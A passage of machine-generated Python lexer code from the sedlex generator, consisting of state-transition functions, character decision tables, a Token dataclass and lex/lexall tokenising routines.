_sedlex_rnd_132[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_131(lexerbuf: lexbuf): result = -1 result = _sedlex_st_54(lexerbuf) return result def _sedlex_rnd_130(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_52(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_21(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_129[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_21(c: int): if c <= -1: return -1 else: if c <= 93: return _sedlex_DT_table_14[c - 0] - 1 else: return 0 def _sedlex_rnd_128(lexerbuf: lexbuf): result = -1 result = _sedlex_st_58(lexerbuf) return result def _sedlex_rnd_127(lexerbuf: lexbuf): result = -1 result = _sedlex_st_53(lexerbuf) return result def _sedlex_rnd_126(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_st_50(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_20(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_125[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_20(c: int): if c <= -1: return -1 else: if c <= 93: return _sedlex_DT_table_13[c - 0] - 1 else: return 0 def _sedlex_rnd_124(lexerbuf: lexbuf): result = -1 result = 60 return result def _sedlex_rnd_123(lexerbuf: lexbuf): result = -1 result = _sedlex_st_49(lexerbuf) return result def _sedlex_st_49(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_19(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_122[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_19(c: int): if c <= -1: return -1 else: if c <= 61: return _sedlex_DT_table_12[c - 0] - 1 else: return 0 def _sedlex_rnd_121(lexerbuf: lexbuf): result = -1 result = _sedlex_st_50(lexerbuf) return result def _sedlex_rnd_120(lexerbuf: lexbuf): result = -1 result = _sedlex_st_49(lexerbuf) return result def _sedlex_st_48(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_18(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_119[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_18(c: int): if c <= -1: return -1 else: if c <= 91: return _sedlex_DT_table_11[c - 0] - 1 else: return 0 def _sedlex_rnd_118(lexerbuf: lexbuf): result = -1 result = _sedlex_st_52(lexerbuf) return result def _sedlex_rnd_117(lexerbuf: lexbuf): result = -1 result = _sedlex_st_50(lexerbuf) return result def _sedlex_rnd_116(lexerbuf: lexbuf): result = -1 result = _sedlex_st_49(lexerbuf) return result def _sedlex_st_47(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 25) state_id = _sedlex_decide_17(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_115[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_17(c: int): if c <= 60: return -1 else: if c <= 91: return _sedlex_DT_table_10[c - 61] - 1 else: return -1 def _sedlex_rnd_114(lexerbuf: lexbuf): result = -1 result = _sedlex_st_60(lexerbuf) return result def _sedlex_rnd_113(lexerbuf: lexbuf): result = -1 result = _sedlex_st_48(lexerbuf) return result def _sedlex_st_46(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_112[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_111(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_45(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 57) state_id = _sedlex_decide_16(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_110[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_16(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_9[c - 48] - 1 else: return -1 def _sedlex_rnd_109(lexerbuf: lexbuf): result = -1 result = _sedlex_st_46(lexerbuf) return result def _sedlex_st_42(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 22) state_id = _sedlex_decide_15(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_108[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_15(c: int): if c <= 60: return -1 else: if c <= 62: return _sedlex_DT_table_8[c - 61] - 1 else: return -1 def _sedlex_rnd_107(lexerbuf: lexbuf): result = -1 result = 24 return result def _sedlex_rnd_106(lexerbuf: lexbuf): result = -1 result = 23 return result def _sedlex_st_40(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 20) state_id = _sedlex_decide_14(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_105[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_14(c: int): if c <= 60: return -1 else: if c <= 61: return 0 else: return -1 def _sedlex_rnd_104(lexerbuf: lexbuf): result = -1 result = 21 return result def _sedlex_st_37(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 17) state_id = _sedlex_decide_13(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_103[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_13(c: int): if c <= 59: return -1 else: if c <= 61: return _sedlex_DT_table_8[c - 60] - 1 else: return -1 def _sedlex_rnd_102(lexerbuf: lexbuf): result = -1 result = 19 return result def _sedlex_rnd_101(lexerbuf: lexbuf): result = -1 result = 18 return result def _sedlex_st_34(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 14) state_id = _sedlex_decide_12(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_100[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_12(c: int): if c <= 57: return -1 else: if c <= 58: return 0 else: return -1 def _sedlex_rnd_99(lexerbuf: lexbuf): result = -1 result = 15 return result def _sedlex_st_33(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_10(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_98[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_97(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_96(lexerbuf: lexbuf): result = -1 result = _sedlex_st_30(lexerbuf) return result def _sedlex_rnd_95(lexerbuf: lexbuf): result = -1 result = _sedlex_st_26(lexerbuf) return result def _sedlex_st_32(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_11(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_94[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_93(lexerbuf: lexbuf): result = -1 result = _sedlex_st_32(lexerbuf) return result def _sedlex_st_31(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_11(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_92[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_11(c: int): if c <= 47: return -1 else: if c <= 122: return _sedlex_DT_table_7[c - 48] - 1 else: return -1 def _sedlex_rnd_91(lexerbuf: lexbuf): result = -1 result = _sedlex_st_32(lexerbuf) return result def _sedlex_st_30(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_10(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_90[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_10(c: int): if c <= 45: return -1 else: if c <= 101: return _sedlex_DT_table_6[c - 46] - 1 else: return -1 def _sedlex_rnd_89(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_88(lexerbuf: lexbuf): result = -1 result = _sedlex_st_30(lexerbuf) return result def _sedlex_rnd_87(lexerbuf: lexbuf): result = -1 result = _sedlex_st_26(lexerbuf) return result def _sedlex_st_29(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_8(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_86[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_85(lexerbuf: lexbuf): result = -1 result = _sedlex_st_29(lexerbuf) return result def _sedlex_st_28(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_8(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_84[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_83(lexerbuf: lexbuf): result = -1 result = _sedlex_st_29(lexerbuf) return result def _sedlex_st_27(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_9(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_82[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_9(c: int): if c <= 47: return -1 else: if c <= 101: return _sedlex_DT_table_5[c - 48] - 1 else: return -1 def _sedlex_rnd_81(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_80(lexerbuf: lexbuf): result = -1 result = _sedlex_st_27(lexerbuf) return result def _sedlex_st_26(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_8(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_79[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_8(c: int): if c <= 47: return -1 else: if c <= 57: return 0 else: return -1 def _sedlex_rnd_78(lexerbuf: lexbuf): result = -1 result = _sedlex_st_27(lexerbuf) return result def _sedlex_st_25(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 58) state_id = _sedlex_decide_7(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_77[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_7(c: int): if c <= 45: return -1 else: if c <= 120: return _sedlex_DT_table_4[c - 46] - 1 else: return -1 def _sedlex_rnd_76(lexerbuf: lexbuf): result = -1 result = _sedlex_st_31(lexerbuf) return result def _sedlex_rnd_75(lexerbuf: lexbuf): result = -1 result = _sedlex_st_28(lexerbuf) return result def _sedlex_rnd_74(lexerbuf: lexbuf): result = -1 result = _sedlex_st_30(lexerbuf) return result def _sedlex_rnd_73(lexerbuf: lexbuf): result = -1 result = _sedlex_st_26(lexerbuf) return result def _sedlex_st_23(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 12) state_id = _sedlex_decide_6(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_72[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_6(c: int): if c <= 46: return -1 else: if c <= 47: return 0 else: return -1 def _sedlex_rnd_71(lexerbuf: lexbuf): result = -1 result = 13 return result def _sedlex_st_21(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 10) state_id = _sedlex_decide_5(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_70[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_69(lexerbuf: lexbuf): result = -1 result = 11 return result def _sedlex_st_20(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 9) state_id = _sedlex_decide_5(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_68[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_5(c: int): if c <= 45: return -1 else: if c <= 46: return 0 else: return -1 def _sedlex_rnd_67(lexerbuf: lexbuf): result = -1 result = _sedlex_st_21(lexerbuf) return result def _sedlex_st_18(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_4(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_66[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_4(c: int): if c <= -1: return -1 else: if c <= 10: return _sedlex_DT_table_3[c - 0] - 1 else: return 0 def _sedlex_rnd_65(lexerbuf: lexbuf): result = -1 result = 55 return result def _sedlex_rnd_64(lexerbuf: lexbuf): result = -1 result = _sedlex_st_18(lexerbuf) return result def _sedlex_st_17(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 8) state_id = _sedlex_decide_3(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_63[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_3(c: int): if c <= 44: return -1 else: if c <= 45: return 0 else: return -1 def _sedlex_rnd_62(lexerbuf: lexbuf): result = -1 result = _sedlex_st_18(lexerbuf) return result def _sedlex_st_8(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 59) state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_61[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_60(lexerbuf: lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_59(lexerbuf: lexbuf): result = -1 result = 59 return result def _sedlex_rnd_58(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_7(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_57[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_56(lexerbuf: lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_55(lexerbuf: lexbuf): result = -1 result = _sedlex_st_8(lexerbuf) return result def _sedlex_rnd_54(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_5(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_53[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_rnd_52(lexerbuf: lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_51(lexerbuf: lexbuf): result = -1 result = 59 return result def _sedlex_rnd_50(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_4(lexerbuf: lexbuf): result = -1 mark(lexerbuf, 61) state_id = _sedlex_decide_2(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_49[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_2(c: int): if c <= -1: return -1 else: if c <= 92: return _sedlex_DT_table_2[c - 0] - 1 else: return 0 def _sedlex_rnd_48(lexerbuf: lexbuf): result = -1 result = _sedlex_st_7(lexerbuf) return result def _sedlex_rnd_47(lexerbuf: lexbuf): result = -1 result = 59 return result def _sedlex_rnd_46(lexerbuf: lexbuf): result = -1 result = _sedlex_st_5(lexerbuf) return result def _sedlex_st_0(lexerbuf: lexbuf): result = -1 state_id = _sedlex_decide_1(public_next_int(lexerbuf)) if state_id >= 0: result = _sedlex_rnd_45[state_id](lexerbuf) else: result = backtrack(lexerbuf) return result def _sedlex_decide_1(c: int): if c <= 126: return _sedlex_DT_table_1[c - -1] - 1 else: return 1 def _sedlex_rnd_44(lexerbuf: lexbuf): result = -1 result = _sedlex_st_145(lexerbuf) return result def _sedlex_rnd_43(lexerbuf: lexbuf): result = -1 result = 52 return result def _sedlex_rnd_42(lexerbuf: lexbuf): result = -1 result = 51 return result def _sedlex_rnd_41(lexerbuf: lexbuf): result = -1 result = 50 return result def _sedlex_rnd_40(lexerbuf: lexbuf): result = -1 result = _sedlex_st_137(lexerbuf) return result def _sedlex_rnd_39(lexerbuf: lexbuf): result = -1 result = _sedlex_st_132(lexerbuf) return result def _sedlex_rnd_38(lexerbuf: lexbuf): result = -1 result = _sedlex_st_125(lexerbuf) return result def _sedlex_rnd_37(lexerbuf: lexbuf): result = -1 result = _sedlex_st_115(lexerbuf) return result def _sedlex_rnd_36(lexerbuf: lexbuf): result = -1 result = _sedlex_st_113(lexerbuf) return result def _sedlex_rnd_35(lexerbuf: lexbuf): result = -1 result = _sedlex_st_108(lexerbuf) return result def _sedlex_rnd_34(lexerbuf: lexbuf): result = -1 result = _sedlex_st_103(lexerbuf) return result def _sedlex_rnd_33(lexerbuf: lexbuf): result = -1 result = _sedlex_st_100(lexerbuf) return result def _sedlex_rnd_32(lexerbuf: lexbuf): result = -1 result = _sedlex_st_96(lexerbuf) return result def _sedlex_rnd_31(lexerbuf: lexbuf): result = -1 result = _sedlex_st_82(lexerbuf) return result def _sedlex_rnd_30(lexerbuf: lexbuf): result = -1 result = _sedlex_st_74(lexerbuf) return result def _sedlex_rnd_29(lexerbuf: lexbuf): result = -1 result = _sedlex_st_72(lexerbuf) return result def _sedlex_rnd_28(lexerbuf: lexbuf): result = -1 result = _sedlex_st_67(lexerbuf) return result def _sedlex_rnd_27(lexerbuf: lexbuf): result = -1 result = _sedlex_st_64(lexerbuf) return result def _sedlex_rnd_26(lexerbuf: lexbuf): result = -1 result = 27 return result def _sedlex_rnd_25(lexerbuf: lexbuf): result = -1 result = 26 return result def _sedlex_rnd_24(lexerbuf: lexbuf): result = -1 result = _sedlex_st_47(lexerbuf) return result def _sedlex_rnd_23(lexerbuf: lexbuf): result = -1 result = _sedlex_st_45(lexerbuf) return result def _sedlex_rnd_22(lexerbuf: lexbuf): result = -1 result = _sedlex_st_42(lexerbuf) return result def _sedlex_rnd_21(lexerbuf: lexbuf): result = -1 result = _sedlex_st_40(lexerbuf) return result def _sedlex_rnd_20(lexerbuf: lexbuf): result = -1 result = _sedlex_st_37(lexerbuf) return result def _sedlex_rnd_19(lexerbuf: lexbuf): result = -1 result = 16 return result def _sedlex_rnd_18(lexerbuf: lexbuf): result = -1 result = _sedlex_st_34(lexerbuf) return result def _sedlex_rnd_17(lexerbuf: lexbuf): result = -1 result = _sedlex_st_33(lexerbuf) return result def _sedlex_rnd_16(lexerbuf: lexbuf): result = -1 result = _sedlex_st_25(lexerbuf) return result def _sedlex_rnd_15(lexerbuf: lexbuf): result = -1 result = _sedlex_st_23(lexerbuf) return result def _sedlex_rnd_14(lexerbuf: lexbuf): result = -1 result = _sedlex_st_20(lexerbuf) return result def _sedlex_rnd_13(lexerbuf: lexbuf): result = -1 result = _sedlex_st_17(lexerbuf) return result def _sedlex_rnd_12(lexerbuf: lexbuf): result = -1 result = 7 return result def _sedlex_rnd_11(lexerbuf: lexbuf): result = -1 result = 6 return result def _sedlex_rnd_10(lexerbuf: lexbuf): result = -1 result = 5 return result def _sedlex_rnd_9(lexerbuf: lexbuf): result = -1 result = 4 return result def _sedlex_rnd_8(lexerbuf: lexbuf): result = -1 result = 3 return result def _sedlex_rnd_7(lexerbuf: lexbuf): result = -1 result = 2 return result def _sedlex_rnd_6(lexerbuf: lexbuf): result = -1 result = 1 return result def _sedlex_rnd_5(lexerbuf: lexbuf): result = -1 result = 0 return result def _sedlex_rnd_4(lexerbuf: lexbuf): result = -1 result = _sedlex_st_4(lexerbuf) return result def _sedlex_rnd_3(lexerbuf: lexbuf): result = -1 result = 56 return result def _sedlex_rnd_2(lexerbuf: lexbuf): result = -1 result = 61 return result def _sedlex_rnd_1(lexerbuf: lexbuf): result = -1 result = 62 return result @dataclasses.dataclass class Token: token_id: int lexeme : str line: int col: int span: int offset: int file: str _Token = typing.TypeVar("_Token") class TokenConstructor(typing_extensions.Protocol[_Token]): def __call__(self, token_id: int, lexeme: str, line: int, col: int, span: int, offset: int, file: str) -> _Token: ... def lex(lexerbuf: lexbuf , construct_token: TokenConstructor[_Token]=Token): start(lexerbuf) case_id = _sedlex_st_0(lexerbuf) if case_id < 0: raise Exception("the last branch must be a catch-all error case!") token_id = _sedlex_rnd_379[case_id] if token_id is not None: return construct_token(token_id, lexeme(lexerbuf), lexerbuf.start_line, lexerbuf.pos - lexerbuf.curr_bol, lexerbuf.pos - lexerbuf.start_pos, lexerbuf.start_pos, lexerbuf.filename) return None def lexall(buf: lexbuf, construct: TokenConstructor[_Token], is_eof: Callable[[_Token], bool]): while True: token = lex(buf, construct) if token is None: continue if is_eof(token): break yield token _sedlex_rnd_378 = [_sedlex_rnd_377] _sedlex_rnd_376 = [_sedlex_rnd_375] _sedlex_rnd_374 = [_sedlex_rnd_372, _sedlex_rnd_373] _sedlex_rnd_371 = [_sedlex_rnd_369, _sedlex_rnd_370] _sedlex_rnd_368 = [_sedlex_rnd_366, _sedlex_rnd_367] _sedlex_DT_table_35 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_365 = [_sedlex_rnd_363, _sedlex_rnd_364] _sedlex_rnd_362 = [_sedlex_rnd_361] _sedlex_rnd_360 = [_sedlex_rnd_358, _sedlex_rnd_359] _sedlex_rnd_357 = [_sedlex_rnd_355, _sedlex_rnd_356] _sedlex_rnd_354 = [_sedlex_rnd_352, _sedlex_rnd_353] _sedlex_rnd_351 = [_sedlex_rnd_349, _sedlex_rnd_350] _sedlex_rnd_348 = [_sedlex_rnd_347] _sedlex_rnd_346 = [_sedlex_rnd_344, _sedlex_rnd_345] _sedlex_rnd_343 = [_sedlex_rnd_341, _sedlex_rnd_342] _sedlex_rnd_340 = [_sedlex_rnd_339] _sedlex_rnd_338 = [_sedlex_rnd_336, _sedlex_rnd_337] _sedlex_rnd_335 = [_sedlex_rnd_333, _sedlex_rnd_334] _sedlex_DT_table_34 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_332 = [_sedlex_rnd_329, _sedlex_rnd_330, _sedlex_rnd_331] _sedlex_rnd_328 = [_sedlex_rnd_327] _sedlex_rnd_326 = [_sedlex_rnd_324, _sedlex_rnd_325] _sedlex_rnd_323 = [_sedlex_rnd_321, _sedlex_rnd_322] _sedlex_DT_table_33 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1] _sedlex_rnd_320 = [_sedlex_rnd_318, _sedlex_rnd_319] _sedlex_rnd_317 = [_sedlex_rnd_316] _sedlex_rnd_315 = [_sedlex_rnd_313, _sedlex_rnd_314] _sedlex_rnd_312 = [_sedlex_rnd_310, _sedlex_rnd_311] _sedlex_rnd_309 = [_sedlex_rnd_307, _sedlex_rnd_308] _sedlex_DT_table_32 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1] _sedlex_rnd_306 = [_sedlex_rnd_303, _sedlex_rnd_304, _sedlex_rnd_305] _sedlex_rnd_302 = [_sedlex_rnd_300, _sedlex_rnd_301] _sedlex_rnd_299 = [_sedlex_rnd_298] _sedlex_rnd_297 = [_sedlex_rnd_295, _sedlex_rnd_296] _sedlex_rnd_294 = [_sedlex_rnd_293] _sedlex_rnd_292 = [_sedlex_rnd_290, _sedlex_rnd_291] _sedlex_rnd_289 = [_sedlex_rnd_288] _sedlex_rnd_287 = [_sedlex_rnd_285, _sedlex_rnd_286] _sedlex_DT_table_31 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_284 = [_sedlex_rnd_281, _sedlex_rnd_282, _sedlex_rnd_283] _sedlex_rnd_280 = [_sedlex_rnd_279] _sedlex_rnd_278 = [_sedlex_rnd_276, _sedlex_rnd_277] _sedlex_rnd_275 = [_sedlex_rnd_273, _sedlex_rnd_274] _sedlex_rnd_272 = [_sedlex_rnd_270, _sedlex_rnd_271] _sedlex_rnd_269 = [_sedlex_rnd_267, _sedlex_rnd_268] _sedlex_rnd_266 = [_sedlex_rnd_265] _sedlex_rnd_264 = [_sedlex_rnd_263] _sedlex_DT_table_30 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_262 = [_sedlex_rnd_259, _sedlex_rnd_260, _sedlex_rnd_261] _sedlex_rnd_258 = [_sedlex_rnd_257] _sedlex_rnd_256 = [_sedlex_rnd_254, _sedlex_rnd_255] _sedlex_rnd_253 = [_sedlex_rnd_251, _sedlex_rnd_252] _sedlex_rnd_250 = [_sedlex_rnd_248, _sedlex_rnd_249] _sedlex_rnd_247 = [_sedlex_rnd_246] _sedlex_rnd_245 = [_sedlex_rnd_243, _sedlex_rnd_244] _sedlex_rnd_242 = [_sedlex_rnd_240, _sedlex_rnd_241] _sedlex_rnd_239 = [_sedlex_rnd_237, _sedlex_rnd_238] _sedlex_DT_table_29 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1] _sedlex_rnd_236 = [_sedlex_rnd_234, _sedlex_rnd_235] _sedlex_DT_table_28 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_233 = [_sedlex_rnd_231, _sedlex_rnd_232] _sedlex_rnd_230 = [_sedlex_rnd_228, _sedlex_rnd_229] _sedlex_rnd_227 = [_sedlex_rnd_226] _sedlex_rnd_225 = [_sedlex_rnd_223, _sedlex_rnd_224] _sedlex_rnd_222 = [_sedlex_rnd_221] _sedlex_rnd_220 = [_sedlex_rnd_218, _sedlex_rnd_219] _sedlex_rnd_217 = [_sedlex_rnd_215, _sedlex_rnd_216] _sedlex_DT_table_27 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] _sedlex_rnd_214 = [_sedlex_rnd_212, _sedlex_rnd_213] _sedlex_DT_table_26 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 4, 1, 1, 1, 1, 1] _sedlex_rnd_211 = [_sedlex_rnd_207, _sedlex_rnd_208, _sedlex_rnd_209, _sedlex_rnd_210] _sedlex_rnd_206 = [_sedlex_rnd_205] _sedlex_rnd_204 = [_sedlex_rnd_202, _sedlex_rnd_203] _sedlex_rnd_201 = [_sedlex_rnd_200] _sedlex_DT_table_25 = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 